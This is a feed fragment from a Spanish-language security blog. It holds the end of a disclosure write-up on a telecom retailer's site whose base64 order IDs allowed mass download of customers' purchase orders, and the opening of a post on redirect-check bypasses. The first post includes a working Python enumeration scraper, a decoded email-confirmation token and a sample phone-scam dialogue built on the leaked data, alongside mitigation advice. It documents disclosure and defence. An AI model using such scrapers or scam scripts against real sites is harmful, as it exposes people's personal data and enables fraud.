&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;url_order = 'https://empresatelefonia.cl/fullprice/certificadopdforden?id={}'.format(b64_order_number)
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;r = requests.get(url_order)
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print('[{}] \t {} -&amp;gt; order: {}'.format(r.status_code, url_order, START_IN))
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if r.status_code == 200:
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;with open('{}/{}.pdf'.format(SAVE_PATH, order_number), 'wb') as f:
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;f.write(r.content)
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;else:
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;continue

def main():
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if not os.path.exists(SAVE_PATH):
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;os.makedirs(SAVE_PATH)
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if len(sys.argv) &amp;gt;= 2:
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;global THREADS
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;THREADS = int(sys.argv[1])
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if len(sys.argv) &amp;gt;= 3:
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;global START_IN
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;START_IN = int(sys.argv[2])
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if len(sys.argv) &amp;gt;= 4:
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;global STOP_IN
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;STOP_IN = int(sys.argv[3])
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for x in range(threads):
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;mythread = ThreadFunction(name = "Thread-{}".format(x + 1))
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;mythread.start()

if __name__ == '__main__':
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;main()&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Modo de uso:&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;python3 ordenes.py &amp;lt;n° de threads&amp;gt; &amp;lt;n° primera orden&amp;gt; &amp;lt;n° última orden&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Con este script se puede obtener 19783 órdenes de compra (510 MBs):&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg99LRWNoh5W1VyjbhyaBfRt4cYlRP5H9t3ZxDuvfcRfhvyEY-nWQll-6xMNvpR_ORwbUUPrIMm7Bb8hDInW9nOSZ4blOSbwwwiFVMfY8IddoBAfiauL9FB5Z5ymfWlDYS2NHKaNt-yAFSe/s1600/ordenes_pdf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="739" data-original-width="945" height="500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg99LRWNoh5W1VyjbhyaBfRt4cYlRP5H9t3ZxDuvfcRfhvyEY-nWQll-6xMNvpR_ORwbUUPrIMm7Bb8hDInW9nOSZ4blOSbwwwiFVMfY8IddoBAfiauL9FB5Z5ymfWlDYS2NHKaNt-yAFSe/s640/ordenes_pdf.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Los datos obtenidos son privados y en su conjunto, sensibles:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgss7sJ1MnOgj1bg23urGrTM4XP5HcfoWZmQ0ehQLhjtTPigi57SP78ScjwPNsXBSDPgbC39MP9WbX0Llfq5NbAuYkYscABEkTMQYCN7YNDLCPzKJq5t39GBJtkf10xi2822nUsOI_vjkbF/s1600/orden_datos.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="898" data-original-width="785" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgss7sJ1MnOgj1bg23urGrTM4XP5HcfoWZmQ0ehQLhjtTPigi57SP78ScjwPNsXBSDPgbC39MP9WbX0Llfq5NbAuYkYscABEkTMQYCN7YNDLCPzKJq5t39GBJtkf10xi2822nUsOI_vjkbF/s640/orden_datos.png" width="558" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
Datos:&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Nombre&lt;/li&gt;
&lt;li&gt;Apellido&lt;/li&gt;
&lt;li&gt;RUT&lt;/li&gt;
&lt;li&gt;Mail&lt;/li&gt;
&lt;li&gt;Teléfono&lt;/li&gt;
&lt;li&gt;Dirección&lt;/li&gt;
&lt;li&gt;Producto y precio de compra&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;b&gt;Vulnerabilidad 2 - Sensitive Data Exposure&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Si se induce un error en la URL anterior, obtenemos un error demasiado verboso:&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;https://empresatelefonia.cl/&lt;wbr&gt;&lt;/wbr&gt;fullprice/certificadopdforden?&lt;wbr&gt;&lt;/wbr&gt;id=jw==&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&amp;nbsp; &lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN26b3aK3qn4M99Ss5WbVz783zwA5IdjwCSZNkJ8DxthTCpEdufWHY1MHtcrildU5R6ENUr_iQAVJzzoSO1IkFcPStl-hKbVLQKQ7gLDMiajUFWjIbBTuPnT_jD3M-X04l10y2gbKu0FEV/s1600/error.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="941" data-original-width="1187" height="506" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN26b3aK3qn4M99Ss5WbVz783zwA5IdjwCSZNkJ8DxthTCpEdufWHY1MHtcrildU5R6ENUr_iQAVJzzoSO1IkFcPStl-hKbVLQKQ7gLDMiajUFWjIbBTuPnT_jD3M-X04l10y2gbKu0FEV/s640/error.png" width="640" /&gt;&lt;/a&gt; &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
Datos obtenidos:&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Ruta completa de la aplicación&lt;/li&gt;
&lt;li&gt;Framework de programación&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;b&gt;Vulnerabilidad 3 - Confirmación de correo&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
En la misma línea se encontró que el enlace para confirmar el correo, también pasa los datos codificados en &lt;i&gt;base64&lt;/i&gt;, por ende fácilmente decodificable:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;https://empresatelefonia.cl/&lt;wbr&gt;&lt;/wbr&gt;ValidacionMailAPP/Valida?&lt;wbr&gt;&lt;/wbr&gt;token=&lt;wbr&gt;&lt;/wbr&gt;cnV0PTE4OTk5OTk5LTAmbWFpbD1waWNob25AZ21haWwuY29tJmVudGlkYWQ9NTY5NSZlbnRpZGFkaWQ9MTA2MTIyOTQw&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;cnV0PTE4OTk5OTk5LTAmbWFpbD1waWNob25AZ21haWwuY29tJmVudGlkYWQ9NTY5NSZlbnRpZGFkaWQ9MTA2MTIyOTQw &lt;b&gt;→ &lt;span style="color: red;"&gt;rut=18999999-0&amp;amp;mail=pichon@gmail.com&amp;amp;entidad=5695&amp;amp;entidadid=106122940&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Más allá de que es una mala práctica pasar datos personales por método &lt;i&gt;GET&lt;/i&gt;, se puede crear un &lt;i&gt;script&lt;/i&gt; que genere automáticamente el "&lt;i&gt;token&lt;/i&gt;" de verificación de correo, bajo el supuesto de que el RUT y correo ya lo tenemos gracias a la vulnerabilidad anterior.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;b&gt;Vulnerabilidad 4 - Demasiada información sin seguridad&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Con el siguiente enlace se puede obtener el seguimiento de una orden, lo que incluye el producto comprado.&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;https://empresatelefonia.cl/&lt;wbr&gt;&lt;/wbr&gt;seguimiento-despacho/&lt;wbr&gt;&lt;/wbr&gt;resultados/index/orden/&lt;span style="color: red;"&gt;4000019&lt;wbr&gt;&lt;/wbr&gt;747&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm0BPOIDFohT0cS1GPchn-pjHq6HSuHpc35-xSDt6twf-Tgi_FQkUFk_NlQjboCxVMvx0ZZR8cdHMA1A4IwsU5EDjjr0jgSE4f5kvpe7Q1Ncew6sLfullgMt4opYD8ymM6BhcpFtDvluW8/s1600/seguimiento.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="699" data-original-width="1095" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm0BPOIDFohT0cS1GPchn-pjHq6HSuHpc35-xSDt6twf-Tgi_FQkUFk_NlQjboCxVMvx0ZZR8cdHMA1A4IwsU5EDjjr0jgSE4f5kvpe7Q1Ncew6sLfullgMt4opYD8ymM6BhcpFtDvluW8/s640/seguimiento.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Esto
 quizás no parece una vulnerabilidad, pero se puede crear un script que 
vaya obteniendo los productos que vende la empresa en tiempo real, 
información muy útil para la competencia.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: x-large;"&gt;&lt;b&gt;Vectores de ataque&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;b&gt;Vector de ataque 1 - Interceptación física&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Con
 la vulnerabilidad 1 y 4 se puede saber quién compra, dónde y cuándo va 
llegar el producto, por tanto un delincuente puede esperar a que llegue 
un repartidor para asaltarlo, ya que se sabe exactamente con que 
producto anda.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;b&gt;Vector de ataque 2 - Estafa telefónica&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;blockquote class="gmail_quote" style="border-left: 1px solid rgb(204,204,204); margin: 0px 0px 0px 0.8ex; padding-left: 1ex;"&gt;
&lt;div&gt;
&lt;b&gt;Delincuente&lt;/b&gt;: Aló&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;Víctima&lt;/b&gt;: Hola&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;b&gt;Delincuente&lt;/b&gt;: Estimado &lt;span style="color: red;"&gt;Rodrigo Perez&lt;/span&gt;, lo llamamos de &lt;span style="color: red;"&gt;Empresa Telefonía&lt;/span&gt; ya que se compró un teléfono&lt;span style="color: red;"&gt; iPhone X&lt;/span&gt; el día de ayer. ¿Cierto? &lt;/div&gt;
&lt;div&gt;
&lt;b&gt;Víctima&lt;/b&gt;: Si&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;b&gt;Delincuente&lt;/b&gt;: Queremos decirle que el celular que le costó &lt;span style="color: red;"&gt;$1.039.000&lt;/span&gt;
 estaba en oferta y se le cobró de más, el precio real era de $690.000. 
¿Sería tan amable de darnos su tarjeta de crédito para abonarle la 
diferencia?&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;Víctima&lt;/b&gt;: Claro&lt;/div&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;b&gt;Vector de ataque 3 - Cualquier tipo de ataque de ingeniería social&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Dado
 que se tienen muchos datos personales, en manos de delincuentes estos 
datos serían propicios para cometer una infinidad de delitos de 
ingeniería social.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: x-large;"&gt;&lt;b&gt;Mitigación&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Siempre que se deba pasar datos sensibles a través de un enlace, este debe ser un &lt;i&gt;token&lt;/i&gt; del &lt;i&gt;id&lt;/i&gt; original.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Se define como &lt;i&gt;token&lt;/i&gt; un &lt;i&gt;string&lt;/i&gt; alfanumérico único lo suficientemente largo para que no sea adivinable y que no exista una función matemática lineal que dado un &lt;i&gt;token&lt;/i&gt; se obtenga el &lt;i&gt;id&lt;/i&gt; original.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Existen muchas funciones generadoras de hash como &lt;i&gt;sha256&lt;/i&gt;, &lt;i&gt;sha2&lt;/i&gt;, &lt;i&gt;sha3&lt;/i&gt;, etc... Para que sea un token seguro se recomienda usar valores aleatorios y una combinación de funciones de hash.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por tanto lo que se debe hacer es crear por cada orden un &lt;i&gt;token&lt;/i&gt; y que los enlaces en la vulnerabilidad 1 y 4 reciban como parámetro ese &lt;i&gt;token&lt;/i&gt;.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Ejemplo:&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;https://empresatelefonia.cl/&lt;wbr&gt;&lt;/wbr&gt;fullprice/certificadopdforden?&lt;wbr&gt;&lt;/wbr&gt;id=&lt;wbr&gt;&lt;/wbr&gt;abfae0f14c8a4c6d08bb618bf19550&lt;wbr&gt;&lt;/wbr&gt;86&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;https://&lt;/b&gt;&lt;b&gt;&lt;b&gt;empresatelefonia&lt;/b&gt;.cl/&lt;wbr&gt;&lt;/wbr&gt;seguimiento-despacho/&lt;wbr&gt;&lt;/wbr&gt;resultados/index/orden/&lt;wbr&gt;&lt;/wbr&gt;abfae0f14c8a4c6d08bb618bf19550&lt;wbr&gt;&lt;/wbr&gt;86&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;table border="1"&gt;
  &lt;tbody&gt;
&lt;tr&gt;
    &lt;th&gt;id_orden&lt;/th&gt;
    &lt;th&gt;token_orden&lt;/th&gt;
    &lt;th&gt;id_cliente&lt;/th&gt;
    &lt;th&gt;...&lt;/th&gt;
  &lt;/tr&gt;
&lt;tr&gt;
    &lt;td&gt;4000019747&lt;/td&gt;
    &lt;td&gt;abfae0f14c8a4c6d08bb618bf1955086&lt;/td&gt;
    &lt;td&gt;231&lt;/td&gt;
    &lt;td&gt;...&lt;/td&gt;
  &lt;/tr&gt;
&lt;tr&gt;
    &lt;td&gt;4000019748&lt;/td&gt;
    &lt;td&gt;0fe44a966488ed7987d0c760d0699365&lt;/td&gt;
    &lt;td&gt;532&lt;/td&gt;
    &lt;td&gt;...&lt;/td&gt;
  &lt;/tr&gt;
&lt;tr&gt;
    &lt;td&gt;...&lt;/td&gt;
    &lt;td&gt;...&lt;/td&gt;
    &lt;td&gt;...&lt;/td&gt;
    &lt;td&gt;...&lt;/td&gt;
  &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Exactamente lo mismo se debe hacer en la vulnerabilidad 3, donde se debe generar un &lt;i&gt;token&lt;/i&gt; único por usuario y pesarlo como parámetro el &lt;i&gt;token&lt;/i&gt; del usuario y no los datos.&lt;/div&gt;
&lt;div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;i&gt;Base64&lt;/i&gt;
 no sirve para cifrar datos ya que solo lo codifica, es decir, existe 
una función que puede revertir la codificación y obtener los datos 
originales.&lt;/div&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style="font-size: x-large;"&gt;&lt;b&gt;Conclusión&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;ol style="text-align: justify;"&gt;
&lt;li&gt;Base64 NO es un método de encriptación.&lt;/li&gt;
&lt;li&gt;La empresa involucrada se comportó muy profesionalmente, me llamaron en menos de 48 horas del reporte, y repararon absolutamente todas las vulnerabilidades en menos de una semana, y eso que eran complicadas de resolver ya que tenían que cambiar el modelo de la base de datos. Además contaban con un área de Cyber Seguridad y no como un &lt;a href="https://www.blackploit.com/2018/04/hackeando-un-banco-caso-real-xss.html"&gt;banco que hablé en el pasado&lt;/a&gt; que trató el problema como un ticket de servicio al cliente. Felicitaciones!&lt;/li&gt;
&lt;li&gt;Los datos obtenidos fueron con fines demostrativos y todas las órdenes obtenidas en el POC fueron eliminadas.&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL82gfr8DlxcJupYtmYWN-vHDbYbnytQA4CWIvUSmCmYRp1i97dMgrkwV0y5IHbfWyrDs_qm2RMzr4a3DP9iy6oaOIdNYQIAyOx_8xr1setDOePBg8Jeyh4Sigb28BJdPOqQXRkXrgGHyj/s1600/wiped.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="441" data-original-width="685" height="412" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL82gfr8DlxcJupYtmYWN-vHDbYbnytQA4CWIvUSmCmYRp1i97dMgrkwV0y5IHbfWyrDs_qm2RMzr4a3DP9iy6oaOIdNYQIAyOx_8xr1setDOePBg8Jeyh4Sigb28BJdPOqQXRkXrgGHyj/s640/wiped.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: x-large;"&gt;&lt;b&gt;Bibliografía&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="https://es.wikipedia.org/wiki/Base64"&gt;https://es.wikipedia.org/wiki/Base64&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://varionet.wordpress.com/2009/11/06/sobre-base64-para-que-usarlo-para-que-no-y-como-manejarlo-en-net-y-asp-net/"&gt;https://varionet.wordpress.com/2009/11/06/sobre-base64-para-que-usarlo-para-que-no-y-como-manejarlo-en-net-y-asp-net/&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
Saludos ;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDqGBiqWr6rAzTefjHCKOYcPnXAuKGE3wqBasLfh43WqCZQSCOsYFLwu9LBemlnzMco7yQO37rBBAKPGosHJi1g1bly86-r4jrW4omLtYxbP3A_h9BClXqNXzmFL2dbhQWM1pMUH7YXh_1/s72-c/base64.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Saltar la confirmación de redireccionamiento en Google y Youtube [Bypass Redirect Check Google / Youtube]</title><link>http://www.blackploit.com/2019/05/bypass-redirect-check-google-youtube.html</link><category>Bug</category><category>Bypass Redirect</category><category>Google</category><category>Youtube</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Mon, 13 May 2019 09:30:00 -0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-1196026821297691941</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwrwrE-8mhUQaFftA_NOVguBISNSMSxEmrEpL-xZWftrZ5cZRdVcYzXA27jS1Xi24N22lm_oX5EQhIykfcPrrlnxImly9cw2LwVL5kadHsJ1d7c5-2x9yhWHiDPW_WxJusJ1llCVSGNoeE/s1600/redirect_yes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="312" data-original-width="675" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwrwrE-8mhUQaFftA_NOVguBISNSMSxEmrEpL-xZWftrZ5cZRdVcYzXA27jS1Xi24N22lm_oX5EQhIykfcPrrlnxImly9cw2LwVL5kadHsJ1d7c5-2x9yhWHiDPW_WxJusJ1llCVSGNoeE/s640/redirect_yes.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
El uso de redirectores en páginas webs es relativamente normal, y sus usos principales son:&lt;/div&gt;
&lt;ol style="text-align: justify;"&gt;
&lt;li&gt;Avisar al usuario que está saliendo del dominio principal.&lt;/li&gt;
&lt;li&gt;Recolectar datos de navegación de los usuarios.&lt;/li&gt;
&lt;li&gt;Llevar al usuario a una página llena de publicidad para que hagas click en un entre que está entre dos banners de publicidad.&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El caso 1 en general lo usan grandes sitios webs para evitar que nos redirijan a sitios webs maliciosos o con phishing sin previo aviso, como lo hace Google en este caso:&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=15&amp;amp;url=&lt;b&gt;&lt;span style="color: red;"&gt;https%3A%2F%2Fwww.blackploit.com&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ9AaItz7T7PY3zKNolmdGJDpTDHKSYUKOyyyoXzraZQGuf33WPzjRhbryfQLQ0ecQ6K10UlwDNBbgKCf2G3NyQg1YTsVLnDLZAI70c9E9izx9-OwQS5lL78VXVLzmaCbmHMPZHwY1dayd/s1600/redirect_google.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="287" data-original-width="629" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ9AaItz7T7PY3zKNolmdGJDpTDHKSYUKOyyyoXzraZQGuf33WPzjRhbryfQLQ0ecQ6K10UlwDNBbgKCf2G3NyQg1YTsVLnDLZAI70c9E9izx9-OwQS5lL78VXVLzmaCbmHMPZHwY1dayd/s400/redirect_google.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Imagen 1: caso 1 de redireccionamiento&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
El caso número 2 es usado por grades plataformas para poder separar las &lt;b&gt;operaciones&lt;/b&gt; con la &lt;b&gt;analítica&lt;/b&gt; del sistema. El caso emblema es Twitter que usa su acortador &lt;b&gt;t.co&lt;/b&gt; para redirigir todo el tráfico y poder analizar el comportamiento de sus usuarios, ejemplo:&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;http://t.co/J3LuvnLZ3X --&amp;gt; https://www.blackploit.com&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Usar un acortador es la mejor forma de hacer un redirector ya que así te aseguras de que nadie pueda ingresar en la URL un parámetro malicioso, no como en el ejemplo del caso 2.&lt;/div&gt;
&lt;br /&gt;
En el caso 3 existen muchos ejemplos de acortadores y redirectores que usan esta estrategia para obtener dinero por clicks en publicidad.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
